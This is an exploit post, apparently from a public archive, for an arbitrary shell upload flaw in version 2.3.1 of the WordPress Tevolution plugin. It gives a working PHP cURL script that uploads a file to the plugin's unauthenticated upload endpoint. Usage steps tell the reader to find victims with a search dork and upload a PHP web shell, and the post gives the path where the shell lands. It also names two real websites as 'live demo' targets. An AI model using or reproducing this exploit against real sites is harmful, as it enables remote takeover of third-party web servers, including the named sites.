WordPress Tevolution 2.3.1 Shell Upload
Posted on 16 August 2016
###################### # Exploit Title : Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:/wp-content/plugins/Tevolution/tmplconnector # Vendor Homepage : https://templatic.com/ # version : 2.3.1 # Tested on: [ BackBox ] # skype:xbadgirl21 # Date: 15/08/2016 # video Proof : https://youtu.be/eVjW6rnaoSY ###################### # [+] DESCRIPTION : ###################### # [+] The Tevolution WordPress plugin enables advanced functionality in our themes. # [+] Some of the features it enables include custom post types, monetization options, custom fieldsa| # [+] An arbitrary shell upload web vulnerability has been detected in the Tevolution Plugin 2.3.1 and below. # [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory ###################### # [+] USAGE : ###################### # 1.- Download or Copy the Exploit C0des # 2.- Use Dork and Choose One Of the Website # 3.- Edit The Script # 4.- Upload Your File : shell.php.jpg or shell.php.txt ###################### # [+] Exploit: ###################### <?php $uploadfile="x21.PhP.Txt"; ///xBADGIRL21 ! Removing my name Doesn't mean you are the Founder or Owner of this ^_^ $ch = curl_init(" http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php "); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('file'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> ###################### # [+] Dev!l Path : ###################### # http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/your-file-name.php.txt ###################### # [+] Live Demo : ###################### # http://guiagronicaragua.com # http://eventsinsuriname.com ###################### # Discovered by : xBADGIRL21 - Unkn0wN # Greetz : All Mauritanien Hackers - NoWhere ####################### ### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't Want me to Write His Name # so I Just Write the Exploit C0des ........... #######################